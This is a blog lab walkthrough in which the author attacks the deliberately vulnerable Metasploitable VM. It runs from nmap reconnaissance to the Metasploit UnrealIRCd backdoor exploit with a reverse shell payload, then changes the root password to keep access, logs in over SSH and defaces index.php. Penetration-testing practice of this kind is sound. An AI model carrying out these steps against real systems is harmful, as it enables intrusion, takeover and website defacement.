Defacing Metasploitable
- Shone Pious
- Sep 28, 2023
- 3 min read
Updated: Sep 30, 2023
In this blog:
This blog is one of a 5 part series on Metasploitable ➡️
Finding target IP (Reconnaissance)
The start to any pentest is reconnaissance and we can do that with NMAP.
We can find the IP address to our Kali machine by typing
ip addr list
Since we have set up the machines in a NAT Network, with a DHCP server running on it, the IP addresses are assigned logically.
And since I set up the Kali machine second, Metasploitable’s IP address is 192.168.10.4 as the first address (192.168.10.1) belongs to the router, and the second address (192.168.10.2) belongs to the local host machine.
NMAP
To scan the network for possible vulnerabilities, in a Kali terminal, type ➡️
nmap -sV 192.168.10.4-SV is the flag for version detection.
The host is up and has many open services that are potentially vulnerable to various attacks.
For example, HTTP on port 80 is open so must be hosting an exposed website as the version is an Apache web server software version 2.2.8.
The version is important for exploiting vulnerabilities.
Pinging the exposed IP address returns packets so we can go to google and search it up and see what it is hosting.
Searchsploit
From the nmap scan, we can also see that there is an unrealircd service running on port 6667.
Unrealircd is a popular IRC server which is a protocol which allows instant internet messaging.
This version of UnrealIRC is known to have vulnerabilities in it so we can use searchsploit to see if there are any exploits available that we can use. Type ➡️
searchsploit unrealirc into the Kali terminal. We can see that a backdoor command execution exploit does in fact exist and that it is a Metasploit module.
Msfconsole
To find the vulnerability, start up Metasploit in the terminal by typing ➡️
msfconsole
Type ➡️
search unrealircin the console. We can see that we can leverage backdoor command execution to gain access.
To use the only exploit available, type ➡️
use 0or ➡️
use [exploit code path]Then type ➡️
show optionsto show any options that need to be changed.
The RHOST, LHOST, RPORT AND LPORT are required and RHOSTS and LHOSTS don't have a value in it.
RHOSTS is the host IP address of the target machine so I will type in the metasploitable machine IP address.
Now set LHOST to the IP address of the kali machine.
Type ➡️
show payloadsto reveal all payloads associated with this specific exploit.
Type ➡️
set payload 5to select ➡️
payload/cmd/unix/reverse
Now type ➡️
exploit
Accessing shell and maintaining privilege
I will run this python script which launches a bash terminal that I can use to interact with the shell ➡️
python -c 'import pty; pty.spawn("/bin/bash")'
Since we can’t escalate privileges any further, we can maintain root access by changing the root user’s password by typing ➡️
paswd root and picking a new password.
SSH into root
We can now gain an SSH shell into the root user’s system by typing ➡️
ssh root@<metasploitable IP address> in a new terminal session.
SSH connect error
if you get this error when trying to connect, try the following command.
ssh -v -oHostKeyAlgorithms=+ssh-rsa username@ipaddress
Defacing website
Now to deface the metasploitable website, we need to find the webserver where the website is running.
When we port scanned, we found out that the webserver was on port 80 and we know that the software version was Apache 2.2.8.
web server files are usually located at /var/www/html. We can CD into /var/www.
Typing ls now shows us the directories and files located within the specified file path. The home page for websites is called ‘index’.
Nano into index.php.
If you get this error ➡️ Error opening terminal: xterm-256color, try the following command ➡️
export TERM=xtermNow nano into the index.php file and edit is as you wish. Then click CTRL+X and Y to save the changes.
Refresh the metasploitable website we had up before, and you will now see the new website.
Commenti